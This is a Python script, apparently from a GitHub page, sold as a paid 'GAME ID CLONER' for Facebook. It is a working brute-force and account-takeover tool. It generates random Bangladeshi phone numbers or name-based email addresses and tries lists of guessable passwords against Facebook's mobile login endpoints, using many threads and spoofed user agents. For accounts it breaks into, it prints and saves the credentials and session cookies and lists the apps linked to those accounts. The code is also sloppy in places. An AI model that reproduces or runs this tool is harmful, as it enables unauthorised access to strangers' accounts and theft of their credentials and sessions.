-
Notifications
You must be signed in to change notification settings - Fork 1
/
Jar-kids.py
681 lines (672 loc) · 28.6 KB
/
Jar-kids.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
#coding★Md.Jahidul islam
#contact★01701707661
#Mr RJ Tool
#!/usr/bin/python3
#-*-coding:utf-8-*-
#!/usr/bin/python3
from os import path
import os,base64,zlib,pip,urllib
print('\n\033[1;37m install modules....\n It will take some seconds...Mr RJ..')
os.system('xdg-open https://youtube.com/channel/UCRedHPu_qhEpO9aLttjRKrg')
import requests,bs4,json,sys,random,datetime,time,re,subprocess,platform,struct
from bs4 import BeautifulSoup as sop
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import os
import random
import requests,bs4,json,sys,random,datetime,time,re,subprocess,platform,struct
from bs4 import BeautifulSoup as sop
from concurrent.futures import ThreadPoolExecutor as tred
import base64
import os,sys,time,json,random,re,string,platform,base64
import requests
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import mechanize
from requests.exceptions import ConnectionError
import string
try:
import requests
except ImportError:
print('\n [✓] installing requests !...\n')
os.system('pip install requests')
try:
import concurrent.futures
except ImportError:
print('\n [✓] installing futures !...\n')
os.system('pip install futures')
try:
import bs4
except ImportError:
print('\n [✓] installing bs4 !...\n')
os.system('pip install bs4')
R = '\033[1;31m' # PUTIH
G = '\033[1;32m' # PUTIH
H = '\033[1;32m' # PUTIH
Y = '\033[1;33m' # PUTIH
Q = '\033[1;37m'
T = '\033[1;34m'
import requests, os, re, bs4,platform, sys, json, time, random, datetime, subprocess, threading, itertools,base64,uuid,zlib
from concurrent.futures import ThreadPoolExecutor as ahmadAXI
from datetime import datetime
from bs4 import BeautifulSoup
R = '\x1b[1;91m'
G = '\x1b[1;92m'
Y = '\x1b[1;93m'
### WARNA RANDOM ###
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
MXD = '\033[1;92m' #MAHADIGREEN
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA MATI
A = '\x1b[1;90m' # WARNA ABU ABU
BN = '\x1b[1;107m' # BELAKANG PUTIH
BBL = '\x1b[1;106m' # BELAKANG BIRU LANGIT
BP = '\x1b[1;105m' # BELAKANG PINK
BB = '\x1b[1;104m' # BELAKANG BIRU
BK = '\x1b[1;103m' # BELAKANG KUNING
BH = '\x1b[1;102m' # BELAKANG HIJAU
BM = '\x1b[1;101m' # BELAJANG MERAH
BA = '\x1b[1;100m' # BELAKANG ABU ABU
ct = datetime.now()
n = ct.month
bulan = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'Agustus', 'September', 'October', 'November', 'December']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
def banner():
print("[=] 😌 Testing New mathod By Jahid")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
P = '\x1b[1;97m' #
M = '\033[1;31m' #
H = '\033[1;32m' #
K = '\x1b[1;97m' #
B = '\x1b[1;97m' #
U = '\x1b[1;95m' #
O = '\x1b[1;97m' #
N = '\x1b[0m' #
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
data,data2={},{}
aman,cp,salah=0,0,0
ubahP,fuck,pwBaru=[],[],[]
ok = []
mnum=[]
cp = []
id = []
user = []
loop = 0
oks = []
cps = []
loop = 0
url_lookup = "https://lookup-id.com/"
url_mb = "https://m.facebook.com"
url_ip = "https://www.httpbin.org/ip"
header_grup = {"user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"}
bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "Augustus", "09": "September", "10": "October", "11": "November", "12": "December"}
done = False
ugen=[]
uas=[]
usa = ["Mozilla/5.0 Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/{str(rr(1111,9999))}.{str(rr(20,100))}.{str(rr(20,100))} (KHTML, like Gecko) Version/{str(rr(20,100))}.0.{str(rr(1111,9999))} Safari/{str(rr(1111,9999))}.{str(rr(20,100))}.{str(rr(20,100))}"]
rr = random.randint
for xd in range(10000):
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['3','4','5','6','7','8','9','10','11','12','13','14','15','16','17'])
c=' en-us; GT-'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
ugen.append(uaku2)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
def menu_apikey():
uuid = str(os.geteuid()) + str(os.getlogin())
id = "@".join(uuid)
server = requests.get('https://raw.githubusercontent.com/Jahidul404/apv/main/apv-a').text
os.system(" clear")
print("""\033[1;37m
/$$ /$$ /$$$$$$$ /$$$$$
| $$$ /$$$ | $$__ $$ |__ $$
| $$$$ /$$$$ /$$$$$$ | $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/ | $$
| $$ $$$| $$| $$ \__/| $$__ $$ /$$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$
| $$ \/ | $$| $$ /$$ | $$ | $$| $$$$$$/
|__/ |__/|__/|__/ |__/ |__/ \______/
┌───────────────────────────────────────┐
│ [✓] AUTHOR : Md.Jahidul islam │
│ [✓] GITHUB : Jahidul404 │
│ [✓] WHATSAPP : +88 01701707661 │
│ [✓] TOOLS : \033[1;32m GAME ID CLONER \033[1;37m │
│ [✓] VRISON : \033[1;32m 1.0.9 \033[1;37m │
└───────────────────────────────────────┘""")
print("\t \033[1;32m FIRST GET APPROVEL\033[1;37m ")
print("")
print(" \033[1;32m THIS TOOLS IS PAID SO YOU NEED GET APPROVED FIRST\033[1;37m\n")
print("")
print("\x1b[1;92m contract Admin to Buy this Tools ");time.sleep (0.1)
print("")
print("\033[1;32 YOUR KEY : "+id)
print("")
print("\033[1;31m COPY YOUR KEY AND SEND TO ADMIN ");time.sleep(0.1)
print("")
print(" Follow Admin Facebook ID,,,,,,,,,,,,,,,,, ");time.sleep(1)
os.system('xdg-open https://www.facebook.com/Jahidul1223')
print("");time.sleep(2)
print("\x1b[0;34m CHECKING YOUR APROVAL............. ");time.sleep (0.5)
try:
httpCaht = requests.get("https://raw.githubusercontent.com/Jahidul404/apv/main/apv-a").text
if id in httpCaht:
print("\033[1;92m YOUR KEY APROVED ");time.sleep(2)
msg = str(os.geteuid())
time.sleep(0.5)
pass
else:
print("\x1b[1;92m Sorry Bro Your Key not Aproved ")
print(" Send payment to Admin and get aproval"); time.sleep(2)
os.system('xdg-open https://wa.me/+8801701707661?text='+id)
time.sleep(2)
sys.exit()
except:
sys.exit()
if name == '__main__':
print(logo)
menu_apikey()
#menu_apikey()
logo=("""\033[1;37m
/$$ /$$ /$$$$$$$ /$$$$$
| $$$ /$$$ | $$__ $$ |__ $$
| $$$$ /$$$$ /$$$$$$ | $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/ | $$
| $$ $$$| $$| $$ \__/| $$__ $$ /$$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$
| $$ \/ | $$| $$ /$$ | $$ | $$| $$$$$$/
|__/ |__/|__/|__/ |__/ |__/ \______/
┌───────────────────────────────────────┐
│ [✓] AUTHOR : Md.Jahidul islam │
│ [✓] GITHUB : Jahidul404 │
│ [✓] WHATSAPP : +88 01701707661 │
│ [✓] TOOLS : \033[1;32m GAME ID CLONER \033[1;37m │
│ [✓] VRISON : \033[1;32m 1.0.9 \033[1;37m │
└───────────────────────────────────────┘""")
def cek_apk(session,coki):
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":coki}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f'%s{P}[%s×%s] %sSorry there is no Active Apk%s '%(N,M,N,B,N))
else:
print(f'[🔥] %s ☆ Your Active Apps ☆ :{B}'%(GREEN))
for i in range(len(game)):
print(f"[%s%s] {H}%s %s"%(N,i+1,game[i].replace("Ditambahkan pada"," Ditambahkan pada"),N))
#else:
#print(f'\r %s[%s!%s] Sorry, Apk check failed invalid cookie'%(N,M,N))
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":coki}).text
sop = BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
if len(game)==0:
print(f'%s[%s!%s] %sSorry there is no Expired Apk%s \n'%(N,B,N,M,N))
else:
print(f'[✔] %s ☑ Your Expired Apps ☑ :{WHITE}'%(M))
for i in range(len(game)):
print(f"[%s%s] %s %s"%(N,i+1,game[i].replace("Kedaluwarsa"," Kedaluwarsa"),N))
else:
print("%s═════════════════════%s═════════════════════%s"%(M,H,P))
def Main():
os.system('clear')
print(logo)
print("[1] BD Number Cloner [CP-OK MIX]")
print("[2] BD Number cloner [APK] ")
print("[3] BD Number cloner [Only Ok]")
print("[4] Facebook CLONING (Email) ")
print("[5] Facebook CLONING (Name)")
print("[6] Contract Admin [Report a problem]")
print('[0] Back')
print(54*'_')
opt = input('Choose option >>> ')
if opt =='1':
virus1()
if opt =='2':
virus2()
if opt =='3':
virus3()
if opt =='4':
virus4()
if opt =='5':
virus5()
if opt =='6':
admin()
elif opt =='0':
exit()
else:
print('\n\033[1;92mChoose valid option\033[0;97m');time.sleep(1)
Main()
def admin():
os.system('clear')
print(logo)
print(50*'_')
print(' [1] Contract WhatsApp ')
print(' [2] Follow Facebook ')
print(' [3] Subscribe Youtube')
print(' [0] Back to Main menu')
bal = input('Choose option >>> ')
if bal =='1':
os.system('xdg-open https://wa.me/+8801701707661');time.sleep(1)
admin()
if bal =='2':
os.system('xdg-open https://www.facebook.com/Jahidul1223');time.sleep(1)
admin()
if bal =='3':
os.system('xdg-open https://youtube.com/channel/UCRedHPu_qhEpO9aLttjRKrg');time.sleep(1)
admin()
if bal =='0':
Main()
def virus1():
user=[]
os.system('clear')
print(logo)
print(" Sim code Example : 016, 017, 018, 019")
kode = input(' [★] Enter sim code: ')
doamin = ' BD Number id cloner [CP-OK MIX] '
limit = int(input('[?] How many numbers do you want to add : '))
for nmbr in range(limit):
koda = ''.join(random.choice(string.digits) for _ in range(2))
kodb = ''.join(random.choice(string.digits) for _ in range(2))
nmp = ''.join(random.choice(string.digits) for _ in range(4))
user.append(nmp)
with ThreadPool(max_workers=50) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' [🔋] Total ids:\033[1;92m '+tl)
print(f' [🔋] Usaragents : '+str(len(ugen)))
print(f' [🔋]\033[1;97m target sim code :\033[1;92m {kode} ')
print(f"\033[1;97m [🔋] Varion:\033[1;92m {doamin}")
print(' \033[1;97m[🔋] The process has been started')
print(' [🔋] use airplane mode if ok ids not code ')
print(50*'_')
for guru in user:
uid = kode+koda+kodb+guru
pwx = [koda+kodb+guru,kodb+guru,kode+koda+kodb,kode+kode,kode+'123',kode+'1234','Bangladesh','i love you','i hate you','i have you','i fuck you']
yaari.submit(a,uid,pwx,tl)
print(50*'_')
print(' [🌹] Crack process has been completed')
print(' [🌹] Ids saved in ok.txt,cp.txt')
print(50*'_')
exit()
def virus2():
user=[]
os.system('clear')
print(logo)
print(" Sim code Example : 016, 017, 018, 019")
kode = input(' [★] Enter sim code: ')
doamin = ' BD Number cloner [APK] '
limit = int(input('[?] How many numbers do you want to add : '))
for nmbr in range(limit):
koda = ''.join(random.choice(string.digits) for _ in range(2))
kodb = ''.join(random.choice(string.digits) for _ in range(2))
nmp = ''.join(random.choice(string.digits) for _ in range(4))
user.append(nmp)
with ThreadPool(max_workers=50) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' [🌹] Total ids:\033[1;92m '+tl)
print(f' [🌹] Usaragents : '+str(len(ugen)))
print(f' [🌹]\033[1;97m target sim code :\033[1;92m {kode} ')
print(f"\033[1;97m [🌹] Varion:\033[1;92m {doamin}")
print(' \033[1;97m[🌹] The process has been started')
print(' [🌹] use airplane mode if ok ids not code ')
print(50*'_')
for guru in user:
uid = kode+koda+kodb+guru
pwx = [koda+kodb+guru,kodb+guru,kode+koda+kodb,kode+kode,kode+'123',kode+'1234','Bangladesh','i love you','i hate you','i have you','বাংলাদেশ']
yaari.submit(b,uid,pwx,tl)
print(50*'_')
print(' [💉] Crack process has been completed')
print(' [💉] Ids saved in ok.txt,cp.txt')
print(50*'_')
exit()
def virus3():
user=[]
os.system('clear')
print(logo)
print(" Sim code Example : 016, 017, 018, 019")
kode = input(' [★] Enter sim code: ')
doamin = ' BD Number cloner [Only Ok] '
limit = int(input('[?] How many numbers do you want to add : '))
for nmbr in range(limit):
koda = ''.join(random.choice(string.digits) for _ in range(2))
kodb = ''.join(random.choice(string.digits) for _ in range(2))
nmp = ''.join(random.choice(string.digits) for _ in range(4))
user.append(nmp)
with ThreadPool(max_workers=50) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' [🌹] Total ids:\033[1;92m '+tl)
print(f' [🌹] Usaragents : '+str(len(ugen)))
print(f' [🌹]\033[1;97m target sim code :\033[1;92m {kode} ')
print(f"\033[1;97m [🌹] Varion:\033[1;92m {doamin}")
print(' \033[1;97m[🌹] The process has been started')
print(' [🌹] use airplane mode if ok ids not code ')
print(50*'_')
for guru in user:
uid = kode+koda+kodb+guru
pwx = [koda+kodb+guru,kodb+guru,kode+koda+kodb,kode+kode,kode+'123',kode+'1234','Bangladesh','i love you','i hate you','i have you','বাংলাদেশ']
yaari.submit(d,uid,pwx,tl)
print(50*'_')
print(' [💉] Crack process has been completed')
print(' [💉] Ids saved in ok.txt,cp.txt')
print(50*'_')
exit()
def virus4():
user=[]
os.system('clear')
print(logo)
kode = input(' [💉] target fast name : ')
kodex = input(' [💉] target last name : ')
print(' [🤝] example Doamin : @gmail.com, @yahoo.com ')
doamin = input(' [📧] Input Doamin : ')
limit = int(input('[?] How many numbers do you want to add : '))
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(1,4))
user.append(nmp)
with ThreadPool(max_workers=30) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' [♥] Total ids:\033[1;92m '+tl)
print(f"\033[1;97m [♥] Target Doamin:\033[1;92m {doamin}")
print(' \033[1;97m[♥] The process has been started')
print(' [♥] Wait for ids ')
print(50*'_')
for guru in user:
uid = kode+kodex+guru+doamin
pwx = [kode,kodex,kode+kodex,kode+'123',kode+'1234',kode+'12345',kode+guru,kodex+'123',kodex+'1234',kodex+'12345']
yaari.submit(c,uid,pwx,tl)
print(50*'_')
print(' [♥] Crack process has been completed')
print(' [♥] Ids saved in ok.txt,cp.txt')
print(50*'_')
def virus5():
user=[]
os.system('clear')
print(logo)
kode = input(' [💉] target fast name : ')
kodex = input(' [💉] target last name : ')
doamin = '.'
limit = int(input('[?] How many numbers do you want to add : '))
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(1,4))
user.append(nmp)
with ThreadPool(max_workers=30) as yaari:
os.system('clear')
print(logo)
tl = str(len(user))
print(' [♥] Total ids:\033[1;92m '+tl)
print(f"\033[1;97m [♥] Target Doamin:\033[1;92m Facebook CLONING (name)")
print(' \033[1;97m[♥] The process has been started')
print(' [♥] Wait for ids ')
print(50*'_')
for guru in user:
uid = kode+doamin+kodex+guru
pwx = [kode,kodex,kode+kodex,kode+'123',kode+'1234',kode+'12345',kode+guru,kodex+'123',kodex+'1234',kodex+'12345']
yaari.submit(c,uid,pwx,tl)
print(50*'_')
print(' [♥] Crack process has been completed')
print(' [♥] Ids saved in ok.txt,cp.txt')
print(50*'_')
def a(uid,pwx,tl):
global loop
global cps
global oks
global agents
try:
for ps in pwx:
session = requests.Session()
sys.stdout.write(f'\r\033[m[JAHID] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
pro = random.choice(ugen)
#oo=random.choice(sss)
free_fb = session.get('https://m.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {"authority": 'm.facebook.com',
"method": 'GET',
"path":'/login/device -based/login/lasync/',
"scheme": 'https',
"accept-language":'en-US, en; q=0.9',
"referer": 'https://m.facebook.com/',
"sec-ch-ua": '"Google Chrome";v="105", "Not)A;Brand";y="g", "Chromium";v="105"',
"sec-ch-ua-mobile": '?1',
"sec-ch-ua-platform": "Windows",
"sec-fetch-dest": 'document',
"sec-fetch-mode": 'navigate',
"sec-fetch-site": 'same-origin',
"upgrade-insecure-requests": '1',
"user-agent": pro}
lo = session.post('https://m.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[65:80]
print(f'\x1b[38;5;46m[ok] '+uid+' | '+ps+'\33[0;92m')
#print(f'\r\033[1;92m [♥] COOKIE : '+coki)
open('/sdcard/jahidok.txt', 'a').write(cid+' | '+ps+'\n')
oks.append(uid)
break
elif 'checkpoint' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[82:97]
print(f"\33[1;91m[CP] {uid} | {ps}")
#print(f'{W}CP-UA--> {pro}\n ')
open('/sdcard/JAHID-CP.txt', 'a').write( uid+' | '+ps+' \n')
cps.append(uid)
break
else:
continue
loop+=1
sys.stdout.write(f'\r\033[m[JAHIDUL] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
# sys.stdout.write(f" \r{R} [{B}JAHID{R}] {P}[{k}{loop}{P}/{h}{len(id)}{P}]â€â€{P}[{H}{ok}{P}]â€â€{P}[{k}{cp}{x}]â€â€[{bo}{'{:.0%}'.format(loop/float(len(id)))}{P}] ")
sys.stdout.flush()
except:
pass
def b(uid,pwx,tl):
global loop
global cps
global oks
global agents
try:
for ps in pwx:
session = requests.Session()
sys.stdout.write(f'\r\033[m[JAHID] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
pro = random.choice(ugen)
#oo=random.choice(sss)
free_fb = session.get('https://free.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {'authority': 'free.facebook.com',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
# Requests sorts cookies= alphabetically
# 'cookie': 'datr=Ji4VZGZ3I-Qd_1lNkI8Zgwin; sb=Ji4VZL-eh-3pDCkWecuumAFU; m_pixel_ratio=3; wd=980x1426; fr=0RKXIq2Fcifn9dnQp..BkFS4m.5f.AAA.0.0.BkFvCz.AWVfdcwAf2M',
'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"Linux"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': pro}
lo = session.post('https://free.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[65:80]
print(f'\r\33[1;92m [JAHID>OK] '+uid+' | '+ps+'\33[0;92m')
print(f'\r\033[1;92m [💥] COOKIE : '+coki)
cek_apk(session,coki)
oks.append(cid)
open('/sdcard/rakibok.txt', 'a').write(cid+' | '+ps+' | '+uid+'\n')
break
else:
continue
loop+=1
sys.stdout.write(f'\r\033[m[Mr J] \033[1;92m%s\033[m |\033[m[\033[mOK :\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
except:
pass
def c(uid,pwx,tl):
global loop
global cps
global oks
global agents
try:
for ps in pwx:
session = requests.Session()
sys.stdout.write(f'\r\033[m[JAHID] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
pro = random.choice(ugen)
#oo=random.choice(sss)
free_fb = session.get('https://m.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {"authority": 'm.facebook.com',
"method": 'GET',
"scheme": 'https',
"accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.8',
"accept-encoding": 'gzip, deflate, br',
"accept-language": 'en-US,en;q=1',
'cache-control': 'no-cache, no-store, must-revalidate',
"referer": 'https://m.free.facebook.com/',
"sec-ch-ua": '"Google Chrome";v="90", "Not)A;Brand";v="8", "Chromium";v="75"',
"sec-ch-ua-mobile": '?0',
"sec-ch-ua-platform": "Windows",
"sec-fetch-dest": 'document',
"sec-fetch-mode": 'navigate',
"sec-fetch-site": 'none',
"sec-fetch-user": '?1',
"upgrade-insecure-requests": '1',
"user-agent": pro}
lo = session.post('https://m.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[65:80]
print(f'\r\33[1;92m [JAHID>OK] '+uid+' | '+ps+'\33[0;92m')
print(f'\r\033[1;92m [💥] COOKIE : '+coki)
oks.append(cid)
open('/sdcard/jahidOK.txt', 'a').write(cid+' | '+ps+'\n')
break
else:
continue
loop+=1
sys.stdout.write(f'\r\033[m[Mr J] \033[1;92m%s\033[m |\033[m[\033[mOK :\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
except:
pass
def d(uid,pwx,tl):
global loop
global cps
global oks
global agents
try:
for ps in pwx:
session = requests.Session()
sys.stdout.write(f'\r\033[m[JAHID] \033[1;92m%s\033[m |\033[m[\033[mOK:\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
pro = random.choice(ugen)
#oo=random.choice(sss)
free_fb = session.get('https://m.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {"authority": 'm.facebook.com',
"method": 'GET',
"path":'/login/device -based/login/lasync/',
"scheme": 'https',
"accept-language":'en-US, en; q=0.9',
"referer": 'https://m.facebook.com/',
"sec-ch-ua": '"Google Chrome";v="105", "Not)A;Brand";y="g", "Chromium";v="105"',
"sec-ch-ua-mobile": '?1',
"sec-ch-ua-platform": "Windows",
"sec-fetch-dest": 'document',
"sec-fetch-mode": 'navigate',
"sec-fetch-site": 'same-origin',
"upgrade-insecure-requests": '1',
"user-agent": pro}
lo = session.post('https://m.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[65:80]
print(f'\r\33[1;92m [JAHID>OK] '+uid+' | '+ps+'\33[0;92m')
print(f'\r\033[1;92m [💥] COOKIE : '+coki)
oks.append(cid)
open('/sdcard/rakibok.txt', 'a').write(cid+' | '+ps+' | '+uid+'\n')
break
else:
continue
loop+=1
sys.stdout.write(f'\r\033[m[Mr J] \033[1;92m%s\033[m |\033[m[\033[mOK :\033[1;92m%s\033[m] '%(loop,len(oks))),
sys.stdout.flush()
except:
pass
Main()